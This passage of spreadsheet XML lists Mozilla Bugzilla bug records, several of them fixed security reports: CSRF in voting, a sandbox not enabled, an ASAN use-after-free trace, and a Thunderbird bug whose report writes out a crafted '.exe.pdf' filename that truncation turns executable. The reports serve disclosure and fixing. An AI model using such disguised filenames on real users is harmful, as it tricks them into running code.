      <c r="G4475" t="n">
        <v>4</v>
      </c>
      <c r="H4475" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4475" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4475" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K4475" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L4475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4475" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4475" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4475" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4475" t="inlineStr"/>
      <c r="Q4475" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4475" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4475" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T4475" t="n">
        <v>1</v>
      </c>
      <c r="U4475" t="n">
        <v>0</v>
      </c>
      <c r="V4475" t="n">
        <v>16</v>
      </c>
      <c r="W4475" t="inlineStr">
        <is>
          <t>DBD::mysql::st execute failed: Unknown column 'product' in 'where clause' [for
Statement "SELECT value FROM milestones WHERE value = '---' AND product =
'TestProduct'"] at ./checksetup.pl line 3051
The problem is that 2.8 has no milestones table. So it's created with a
"product_id" column, not a product column.
I think the problem is that table *creation*, unlike table changes, does not
happen in time sequence, but all at the beginning. So when we're running that
part of the script, the target_milestone table has a product_id field, not a
product field.
This is causing the checksetup tinderbox to burn.</t>
        </is>
      </c>
      <c r="X4475" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4476">
      <c r="A4476" t="n">
        <v>412990</v>
      </c>
      <c r="B4476" t="inlineStr">
        <is>
          <t>2008-01-18 10:55:25 -0800</t>
        </is>
      </c>
      <c r="C4476" t="inlineStr">
        <is>
          <t>Sherlock conversion code fails to add icon</t>
        </is>
      </c>
      <c r="D4476" t="inlineStr">
        <is>
          <t>2008-02-05 08:19:21 -0800</t>
        </is>
      </c>
      <c r="E4476" t="n">
        <v>1</v>
      </c>
      <c r="F4476" t="n">
        <v>1</v>
      </c>
      <c r="G4476" t="n">
        <v>2</v>
      </c>
      <c r="H4476" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4476" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4476" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K4476" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4476" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4476" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4476" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4476" t="inlineStr"/>
      <c r="Q4476" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4476" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4476" t="inlineStr">
        <is>
          <t>Firefox 3 beta3</t>
        </is>
      </c>
      <c r="T4476" t="n">
        <v>1</v>
      </c>
      <c r="U4476" t="n">
        <v>0</v>
      </c>
      <c r="V4476" t="n">
        <v>4</v>
      </c>
      <c r="W4476" t="inlineStr">
        <is>
          <t>Bug 363512 removed the b64 function in favor of the built-in btoa(), but forgot to update a caller. Unfortunately the caller is in a try/catch block so its failure was hard to miss.</t>
        </is>
      </c>
      <c r="X4476" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4477">
      <c r="A4477" t="n">
        <v>451341</v>
      </c>
      <c r="B4477" t="inlineStr">
        <is>
          <t>2008-08-20 01:08:04 -0700</t>
        </is>
      </c>
      <c r="C4477" t="inlineStr">
        <is>
          <t>xulrunner crashes when fails to find the window on which to change the cursor</t>
        </is>
      </c>
      <c r="D4477" t="inlineStr">
        <is>
          <t>2009-06-14 14:00:58 -0700</t>
        </is>
      </c>
      <c r="E4477" t="n">
        <v>1</v>
      </c>
      <c r="F4477" t="n">
        <v>1</v>
      </c>
      <c r="G4477" t="n">
        <v>3</v>
      </c>
      <c r="H4477" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4477" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4477" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K4477" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4477" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4477" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4477" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4477" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4477" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4477" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4477" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4477" t="inlineStr">
        <is>
          <t>mozilla1.9.1b4</t>
        </is>
      </c>
      <c r="T4477" t="n">
        <v>1</v>
      </c>
      <c r="U4477" t="n">
        <v>0</v>
      </c>
      <c r="V4477" t="n">
        <v>31</v>
      </c>
      <c r="W4477" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1
Build Identifier: 
In http://mxr.mozilla.org/seamonkey/source/widget/src/gtk2/nsWindow.cpp#923 :
914 NS_IMETHODIMP
915 nsWindow::SetCursor(nsCursor aCursor)
916 {
917     // if we're not the toplevel window pass up the cursor request to
918     // the toplevel window to handle it.
919     if (!mContainer &amp;&amp; mDrawingarea) {
920         GtkWidget *widget =
921             get_gtk_widget_for_gdk_window(mDrawingarea-&gt;inner_window);
922         nsWindow *window = get_window_for_gtk_widget(widget);
923         return window-&gt;SetCursor(aCursor);
924     }
get_window_for_gtk_widget() can return NULL in some circumstances, we should guard against this with something similar to this (from nsWindow::SetModal(PRBool aModal)):
547         if (!parent)
548             return NS_ERROR_FAILURE;
Reproducible: Couldn't Reproduce
An user of Sugar has reported it, but I couldn't reproduce it.</t>
        </is>
      </c>
      <c r="X4477" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4478">
      <c r="A4478" t="n">
        <v>621105</v>
      </c>
      <c r="B4478" t="inlineStr">
        <is>
          <t>2010-12-22 23:17:44 -0800</t>
        </is>
      </c>
      <c r="C4478" t="inlineStr">
        <is>
          <t>[SECURITY] Voting lacks CSRF protection</t>
        </is>
      </c>
      <c r="D4478" t="inlineStr">
        <is>
          <t>2016-02-26 21:19:42 -0800</t>
        </is>
      </c>
      <c r="E4478" t="n">
        <v>1</v>
      </c>
      <c r="F4478" t="n">
        <v>1</v>
      </c>
      <c r="G4478" t="n">
        <v>4</v>
      </c>
      <c r="H4478" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4478" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4478" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K4478" t="inlineStr">
        <is>
          <t>3.6.3</t>
        </is>
      </c>
      <c r="L4478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4478" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4478" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4478" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4478" t="inlineStr">
        <is>
          <t>[infrasec:csrf][ws:moderate]</t>
        </is>
      </c>
      <c r="Q4478" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4478" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S4478" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4478" t="n">
        <v>1</v>
      </c>
      <c r="U4478" t="n">
        <v>0</v>
      </c>
      <c r="V4478" t="n">
        <v>26</v>
      </c>
      <c r="W4478" t="inlineStr">
        <is>
          <t>Voting lacks CSRF protection.</t>
        </is>
      </c>
      <c r="X4478" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4479">
      <c r="A4479" t="n">
        <v>1746139</v>
      </c>
      <c r="B4479" t="inlineStr">
        <is>
          <t>2021-12-14 23:24:02 -0800</t>
        </is>
      </c>
      <c r="C4479" t="inlineStr">
        <is>
          <t>Thunderbird Windows - Drag&amp;Drop limited to 128 chars, allowing to change the file extension on drop</t>
        </is>
      </c>
      <c r="D4479" t="inlineStr">
        <is>
          <t>2024-07-18 20:54:24 -0700</t>
        </is>
      </c>
      <c r="E4479" t="n">
        <v>1</v>
      </c>
      <c r="F4479" t="n">
        <v>1</v>
      </c>
      <c r="G4479" t="n">
        <v>3</v>
      </c>
      <c r="H4479" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4479" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4479" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K4479" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4479" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4479" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4479" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4479" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4479" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][win:security][post-critsmash-triage][adv-main108+][adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q4479" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4479" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4479" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T4479" t="n">
        <v>1</v>
      </c>
      <c r="U4479" t="n">
        <v>0</v>
      </c>
      <c r="V4479" t="n">
        <v>46</v>
      </c>
      <c r="W4479" t="inlineStr">
        <is>
          <t>Created attachment 9255446
Thunderbird_DragAndDropoutput.gif
If a long file name is drag and dropped from an email, thunderbird under windows is cutting the filename at 128 chars.
Thunderbird Version: 91.4.0 (64-Bit) under Windows 10 64bit
This allows an attacker to craft a file like: 
totally_not_malicious_file_with_more_then_128_characters_definetly_no_problem_here_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe.pdf
Which seems to the user to be a PDF file, but after the drop is cut to .exe and therefore executable under windows. This might result in accidential execution of code by the user.
Attached there is a gif showing the process.
As under Windows there are some filetypes, like the ".SearchConnector-ms" (https://filesec.io/searchConnector-ms) which triggers automatic actions, this might have a bigger impact.</t>
        </is>
      </c>
      <c r="X4479" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4480">
      <c r="A4480" t="n">
        <v>1379</v>
      </c>
      <c r="B4480" t="inlineStr">
        <is>
          <t>1998-11-15 17:38:22 -0800</t>
        </is>
      </c>
      <c r="C4480" t="inlineStr">
        <is>
          <t>ss: crash because table frame has a displayType of inline</t>
        </is>
      </c>
      <c r="D4480" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:21 -0700</t>
        </is>
      </c>
      <c r="E4480" t="n">
        <v>1</v>
      </c>
      <c r="F4480" t="n">
        <v>1</v>
      </c>
      <c r="G4480" t="n">
        <v>3</v>
      </c>
      <c r="H4480" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4480" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4480" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K4480" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4480" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4480" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4480" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4480" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4480" t="inlineStr"/>
      <c r="Q4480" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4480" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4480" t="inlineStr">
        <is>
          <t>M1</t>
        </is>
      </c>
      <c r="T4480" t="n">
        <v>1</v>
      </c>
      <c r="U4480" t="n">
        <v>0</v>
      </c>
      <c r="V4480" t="n">
        <v>9</v>
      </c>
      <c r="W4480" t="inlineStr">
        <is>
          <t>I don't know if this is because style resolution is broken or because of some
monkeying around that layout is doing.  But I'm getting a table frame with a
display type of "2" and that is breaking my code.  I hit an assert when a table
row can't find it's parent table properly.</t>
        </is>
      </c>
      <c r="X4480" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4481">
      <c r="A4481" t="n">
        <v>1300083</v>
      </c>
      <c r="B4481" t="inlineStr">
        <is>
          <t>2016-09-02 05:22:12 -0700</t>
        </is>
      </c>
      <c r="C4481" t="inlineStr">
        <is>
          <t>64-bit NPAPI sandbox isn't enabled on fresh profile</t>
        </is>
      </c>
      <c r="D4481" t="inlineStr">
        <is>
          <t>2017-02-24 12:12:22 -0800</t>
        </is>
      </c>
      <c r="E4481" t="n">
        <v>1</v>
      </c>
      <c r="F4481" t="n">
        <v>1</v>
      </c>
      <c r="G4481" t="n">
        <v>3</v>
      </c>
      <c r="H4481" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4481" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4481" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K4481" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L4481" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4481" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4481" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4481" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4481" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+] sbwn1</t>
        </is>
      </c>
      <c r="Q4481" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4481" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4481" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T4481" t="n">
        <v>1</v>
      </c>
      <c r="U4481" t="n">
        <v>0</v>
      </c>
      <c r="V4481" t="n">
        <v>16</v>
      </c>
      <c r="W4481" t="inlineStr">
        <is>
          <t>There may be other things apart from a new profile that cause this.
I noticed this by chance and it possibly explains why people trying to reproduce bug 1241250 were having problems, if they were using fresh installs and profiles.
It was introduced by bug 1246574.
[Tracking Requested - why for this release]
Very simple fix to ensure sandbox is always in place by default.</t>
        </is>
      </c>
      <c r="X4481" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4482">
      <c r="A4482" t="n">
        <v>773110</v>
      </c>
      <c r="B4482" t="inlineStr">
        <is>
          <t>2012-07-11 17:52:04 -0700</t>
        </is>
      </c>
      <c r="C4482" t="inlineStr">
        <is>
          <t>Site Up and Down</t>
        </is>
      </c>
      <c r="D4482" t="inlineStr">
        <is>
          <t>2016-04-26 13:06:30 -0700</t>
        </is>
      </c>
      <c r="E4482" t="n">
        <v>1</v>
      </c>
      <c r="F4482" t="n">
        <v>1</v>
      </c>
      <c r="G4482" t="n">
        <v>6</v>
      </c>
      <c r="H4482" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4482" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J4482" t="inlineStr">
        <is>
          <t>etherpad.mozilla.org</t>
        </is>
      </c>
      <c r="K4482" t="inlineStr">
        <is>
          <t>Beta</t>
        </is>
      </c>
      <c r="L4482" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4482" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4482" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4482" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4482" t="inlineStr"/>
      <c r="Q4482" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4482" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4482" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4482" t="n">
        <v>0</v>
      </c>
      <c r="U4482" t="n">
        <v>0</v>
      </c>
      <c r="V4482" t="n">
        <v>4</v>
      </c>
      <c r="W4482" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Actual results:
My etherpad site keeps going down today - one minute it's working, and ten minutes later, it's not... The main site etherpad.mozilla.org/ always loads, but often when using my subdomain (example.etherpad.mozilla.org/ or whatever), I get a DNS failed issue, and it won't load. Ten minutes later, it will. Just seems very unstable. Ideas?</t>
        </is>
      </c>
      <c r="X4482" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4483">
      <c r="A4483" t="n">
        <v>883313</v>
      </c>
      <c r="B4483" t="inlineStr">
        <is>
          <t>2013-06-14 12:13:26 -0700</t>
        </is>
      </c>
      <c r="C4483" t="inlineStr">
        <is>
          <t>ASAN heap-use-after-free in nsINode::GetParentNode</t>
        </is>
      </c>
      <c r="D4483" t="inlineStr">
        <is>
          <t>2014-11-19 20:03:02 -0800</t>
        </is>
      </c>
      <c r="E4483" t="n">
        <v>1</v>
      </c>
      <c r="F4483" t="n">
        <v>1</v>
      </c>
      <c r="G4483" t="n">
        <v>3</v>
      </c>
      <c r="H4483" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4483" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4483" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4483" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4483" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4483" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4483" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4483" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4483" t="inlineStr">
        <is>
          <t>[asan][adv-main23+]</t>
        </is>
      </c>
      <c r="Q4483" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4483" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4483" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T4483" t="n">
        <v>1</v>
      </c>
      <c r="U4483" t="n">
        <v>0</v>
      </c>
      <c r="V4483" t="n">
        <v>16</v>
      </c>
      <c r="W4483" t="inlineStr">
        <is>
          <t>Created attachment 762838
testcase (crashes firefox)
The attached testcase crashes the ASAN build of Firefox nightly.
Asan output:
==58460== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f9328660368 at pc 0x7f934b907d3b bp 0x7fff6226ffe0 sp 0x7fff6226ffd8
READ of size 8 at 0x7f9328660368 thread T0
    #0 0x7f934b907d3a in nsINode::GetParentNode() const /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../dist/include/nsINode.h:760:0
    #1 0x7f934c802df6 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:1663:0
    #2 0x7f934cbd1707 in nsHTMLDocument::SetBody(nsGenericHTMLElement*, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/html/document/src/nsHTMLDocument.cpp:1132:0
    #3 0x7f934e4ff309 in mozilla::dom::HTMLDocumentBinding::set_body(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitSetterCallArgs) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:201:0
    #4 0x7f934e4fbeb5 in mozilla::dom::HTMLDocumentBinding::genericSetter(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:1468:0
    #5 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #6 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #7 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #8 0x7f934fdf729c in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:505:0
    #9 0x7f93500fd3aa in js::CallSetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, int, JS::MutableHandle&lt;JS::Value&gt;), unsigned int, unsigned int, int, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:452:0
    #10 0x7f93501409f6 in js::BaseProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:240:0
    #11 0x7f935015b600 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2544:0
    #12 0x7f935015f29e in proxy_SetGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2856:0
    #13 0x7f93500e8a68 in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobj.cpp:1657:0
    #14 0x7f934fdae1b1 in JSObject::setGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobjinlines.h:83:0
    #15 0x7f9350145a72 in js::DirectProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:611:0
    #16 0x7f9350282514 in js::CrossCompartmentWrapper::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jswrapper.cpp:323:0
    #17 0x7f935015b600 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2544:0
    #18 0x7f935015f29e in proxy_SetGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2856:0
    #19 0x7f93500e8a68 in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobj.cpp:1657:0
    #20 0x7f934fdae1b1 in JSObject::setGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobjinlines.h:83:0
    #21 0x7f934fe026e5 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter-inl.h:365:0
    #22 0x7f934fdead7a in
    #23 0x7f934fde3adc in js::RunScript(JSContext*, js::StackFrame*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:345:0
    #24 0x7f934fdf5423 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:401:0
    #25 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #26 0x7f93501436f1 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:479:0
    #27 0x7f93502836bb in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jswrapper.cpp:447:0
    #28 0x7f935015c1de in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2616:0
    #29 0x7f9350160d00 in proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:3180:0
    #30 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #31 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #32 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #33 0x7f934ff79461 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:5885:0
    #34 0x7f934d7b730c in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1437:0
    #35 0x7f934d7aa1b8 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedJS.cpp:589:0
